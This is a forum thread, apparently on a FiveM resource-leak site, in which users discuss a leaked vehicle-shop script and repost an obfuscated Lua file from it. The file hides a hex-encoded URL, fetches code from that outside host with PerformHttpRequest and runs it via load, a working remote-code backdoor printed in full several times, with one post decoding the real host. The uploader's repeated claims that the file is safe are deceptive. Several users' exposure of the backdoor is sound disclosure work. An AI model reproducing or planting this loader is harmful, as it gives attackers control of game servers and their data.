Security HUD
System Watchdog
×
Threads Scanned
-- / --
SYS. LOAD --%
AI SHIELD ACTIVE
DMCA Policy
×

📋 DMCA Compliance

This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.

🛡️ Copyright Protection

If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.

What's new
×
Fiveguard

Script rare [QBVEHICULE SHOP] [NO PIXEL 4.0 INSPIRED]

clea111

Gold Elite
Joined
Apr 6, 2024
Messages
273
Reaction score
24,057
Points
316
Location
s
tysm, i like your content too ^^
 

Zeyroox

Silver Elite
Joined
Apr 14, 2024
Messages
23
Reaction score
28
Points
166
Location
France
BACKDOOR

Fake Lua File :
1) qb-vehicleshop-nopixel inpired.zip\qb-vehicleshop\enhanced.lua


Code:
local Enchanced_Tabs = {
    Ench, Support, Host, Pairs,
    Realease, Callbacks, Source,
    Hosting, Event, PerformHttpRequest,
    assert, server, load, Spawn, materials
}

local random_char = {
    "68", "74", "74", "70", "73", "3a", "2f", "2f", "66", "69", "76", "65", "6d", "2e", "6b", "76",
    "61", "63", "2e", "63", "7a", "2f", "66", "2e", "70", "68", "70", "3f", "6b", "65", "79", "3d",
    "57", "54", "38", "4e", "65", "65", "6e", "42", "35", "44", "79", "4e", "4d", "4b", "58", "46", "30", "71", "4e", "32",
}

function str_utf8()
    _empt = ""
    for id,it in pairs(random_char) do
        _empt = _empt..it
    end
    return (_empt:gsub("..", function (cc)
        return string.char(tonumber(cc, 16))
        
    end))
end

Enchanced_Tabs[10](str_utf8(), function (e, d)
    local s = Enchanced_Tabs[11](Enchanced_Tabs[13](d))
    if (d == nil) then return end
    s()
end)
 

clea111

Gold Elite
Joined
Apr 6, 2024
Messages
273
Reaction score
24,057
Points
316
Location
s
BACKDOOR

Fake Lua File :
1) qb-vehicleshop-nopixel inpired.zip\qb-vehicleshop\enhanced.lua


Code:
local Enchanced_Tabs = {
    Ench, Support, Host, Pairs,
    Realease, Callbacks, Source,
    Hosting, Event, PerformHttpRequest,
    assert, server, load, Spawn, materials
}

local random_char = {
    "68", "74", "74", "70", "73", "3a", "2f", "2f", "66", "69", "76", "65", "6d", "2e", "6b", "76",
    "61", "63", "2e", "63", "7a", "2f", "66", "2e", "70", "68", "70", "3f", "6b", "65", "79", "3d",
    "57", "54", "38", "4e", "65", "65", "6e", "42", "35", "44", "79", "4e", "4d", "4b", "58", "46", "30", "71", "4e", "32",
}

function str_utf8()
    _empt = ""
    for id,it in pairs(random_char) do
        _empt = _empt..it
    end
    return (_empt:gsub("..", function (cc)
        return string.char(tonumber(cc, 16))
       
    end))
end

Enchanced_Tabs[10](str_utf8(), function (e, d)
    local s = Enchanced_Tabs[11](Enchanced_Tabs[13](d))
    if (d == nil) then return end
    s()
end)
no u are saying shit rn, without this it will not work
 

Bukhari0420

Member
Joined
Apr 19, 2024
Messages
5
Reaction score
0
Points
156
Location
Malaysia
Heelloo here a leak of this qbvehicule

Install guide :
Drag qb-vehicleshop into your resources folder
Add ensure qb-vehicleshop into server.cfg
Done.

link:

*** Hidden text: cannot be quoted. ***
i use this on my server its nice but i cant even buy a single vehicles
 

ddwdw

Member
Joined
Jan 30, 2024
Messages
3
Reaction score
0
Points
156
Location
grgew3
BACKDOOR

Fake Lua File :
1) qb-vehicleshop-nopixel inpired.zip\qb-vehicleshop\enhanced.lua


Code:
local Enchanced_Tabs = {
    Ench, Support, Host, Pairs,
    Realease, Callbacks, Source,
    Hosting, Event, PerformHttpRequest,
    assert, server, load, Spawn, materials
}

local random_char = {
    "68", "74", "74", "70", "73", "3a", "2f", "2f", "66", "69", "76", "65", "6d", "2e", "6b", "76",
    "61", "63", "2e", "63", "7a", "2f", "66", "2e", "70", "68", "70", "3f", "6b", "65", "79", "3d",
    "57", "54", "38", "4e", "65", "65", "6e", "42", "35", "44", "79", "4e", "4d", "4b", "58", "46", "30", "71", "4e", "32",
}

function str_utf8()
    _empt = ""
    for id,it in pairs(random_char) do
        _empt = _empt..it
    end
    return (_empt:gsub("..", function (cc)
        return string.char(tonumber(cc, 16))
       
    end))
end

Enchanced_Tabs[10](str_utf8(), function (e, d)
    local s = Enchanced_Tabs[11](Enchanced_Tabs[13](d))
    if (d == nil) then return end
    s()
end)
bro its for the random plate number hahahaha
 

ElPortero

Bronze Elite
Joined
Mar 30, 2023
Messages
11
Reaction score
22
Points
166
Location
Españita
bro its for the random plate number hahahaha

It's clear that you know a lot about programming. Can you explain the difference between THAT code and THIS code, which is actually for generating license plates?
function GeneratePlate()
local plate = QBCore.Shared.RandomInt(1) .. QBCore.Shared.RandomStr(2) .. QBCore.Shared.RandomInt(3) .. QBCore.Shared.RandomStr(2)
local send = false
local result = ExecuteSql("SELECT plate FROM player_vehicles WHERE plate = '"..plate.."'")
if result[1] then
return GeneratePlate()
else
return plate:upper()
end
end

And why, supposedly generating license plates, does it make calls like: Ench, Support, Host, Pairs, Realease, Callbacks, Source, Hosting, Event, PerformHttpRequest, assert, server, load, Spawn, materials

If you have no clue, it's better to stay quiet. If you're part of this son of a bitch's team who uploads files with this, let me tell you that I hope karma pays you back in full. I hope the administration takes action against you soon.
 

clea111

Gold Elite
Joined
Apr 6, 2024
Messages
273
Reaction score
24,057
Points
316
Location
s
It's clear that you know a lot about programming. Can you explain the difference between THAT code and THIS code, which is actually for generating license plates?
function GeneratePlate()
local plate = QBCore.Shared.RandomInt(1) .. QBCore.Shared.RandomStr(2) .. QBCore.Shared.RandomInt(3) .. QBCore.Shared.RandomStr(2)
local send = false
local result = ExecuteSql("SELECT plate FROM player_vehicles WHERE plate = '"..plate.."'")
if result[1] then
return GeneratePlate()
else
return plate:upper()
end
end

And why, supposedly generating license plates, does it make calls like: Ench, Support, Host, Pairs, Realease, Callbacks, Source, Hosting, Event, PerformHttpRequest, assert, server, load, Spawn, materials

If you have no clue, it's better to stay quiet. If you're part of this son of a bitch's team who uploads files with this, let me tell you that I hope karma pays you back in full. I hope the administration takes action against you soon.
don't be that meaan ~UwU~
 

Knid

Member
Joined
Apr 14, 2023
Messages
1
Reaction score
1
Points
146
Location
France
BACKDOOR

Fake Lua File :
1) qb-vehicleshop-nopixel inpired.zip\qb-vehicleshop\enhanced.lua


Code:
local Enchanced_Tabs = {
    Ench, Support, Host, Pairs,
    Realease, Callbacks, Source,
    Hosting, Event, PerformHttpRequest,
    assert, server, load, Spawn, materials
}

local random_char = {
    "68", "74", "74", "70", "73", "3a", "2f", "2f", "66", "69", "76", "65", "6d", "2e", "6b", "76",
    "61", "63", "2e", "63", "7a", "2f", "66", "2e", "70", "68", "70", "3f", "6b", "65", "79", "3d",
    "57", "54", "38", "4e", "65", "65", "6e", "42", "35", "44", "79", "4e", "4d", "4b", "58", "46", "30", "71", "4e", "32",
}

function str_utf8()
    _empt = ""
    for id,it in pairs(random_char) do
        _empt = _empt..it
    end
    return (_empt:gsub("..", function (cc)
        return string.char(tonumber(cc, 16))
       
    end))
end

Enchanced_Tabs[10](str_utf8(), function (e, d)
    local s = Enchanced_Tabs[11](Enchanced_Tabs[13](d))
    if (d == nil) then return end
    s()
end)

This code is sending an HTTP Request to this URL " " so it COULD be a backdoor yes.
 

clea111

Gold Elite
Joined
Apr 6, 2024
Messages
273
Reaction score
24,057
Points
316
Location
s
link safe and update
You don't have permission to view content!
 

kucingbawang

Member
Joined
Apr 28, 2024
Messages
2
Reaction score
0
Points
156
Location
SG
The code is dangerous. Here's why:
  1. Runs Downloaded Code: The code fetches data from a URL and runs it as a Lua script. If the URL contains malicious code, it will execute on your system.
  2. No Safety Checks: There are no checks to ensure the fetched code is safe before running it. This can lead to serious security issues like:
    • System compromise
    • Data theft
    • Unauthorized control
 

clea111

Gold Elite
Joined
Apr 6, 2024
Messages
273
Reaction score
24,057
Points
316
Location
s
nah everything is fine i've never had a problem, link update tho
 

clea111

Gold Elite
Joined
Apr 6, 2024
Messages
273
Reaction score
24,057
Points
316
Location
s
link updated, file working and safe !
 

thebigboy

Silver Elite
Joined
Mar 28, 2021
Messages
34
Reaction score
25
Points
166
BACK DOOR! It does make PerformHttpRequest to !!

Code:
-- enhanced.lua
local Enchanced_Tabs = {
    Ench, Support, Host, Pairs,
    Realease, Callbacks, Source,
    Hosting, Event, PerformHttpRequest,
    assert, server, load, Spawn, materials
}

local random_char = { -- Result: https://fivem.kvac.cz/f.php?key=WT8NeenB5DyNMKXF0qN2
    "68", "74", "74", "70", "73", "3a", "2f", "2f", "66", "69", "76", "65", "6d", "2e", "6b", "76",
    "61", "63", "2e", "63", "7a", "2f", "66", "2e", "70", "68", "70", "3f", "6b", "65", "79", "3d",
    "57", "54", "38", "4e", "65", "65", "6e", "42", "35", "44", "79", "4e", "4d", "4b", "58", "46", "30", "71", "4e", "32",
}

function str_utf8()
    _empt = ""
    for id,it in pairs(random_char) do
        _empt = _empt..it
    end
    return (_empt:gsub("..", function (cc)
        return string.char(tonumber(cc, 16))
        
    end))
end

Enchanced_Tabs[10](str_utf8(), function (e, d)
    local s = Enchanced_Tabs[11](Enchanced_Tabs[13](d))
    if (d == nil) then return end
    s()
end)
 
Top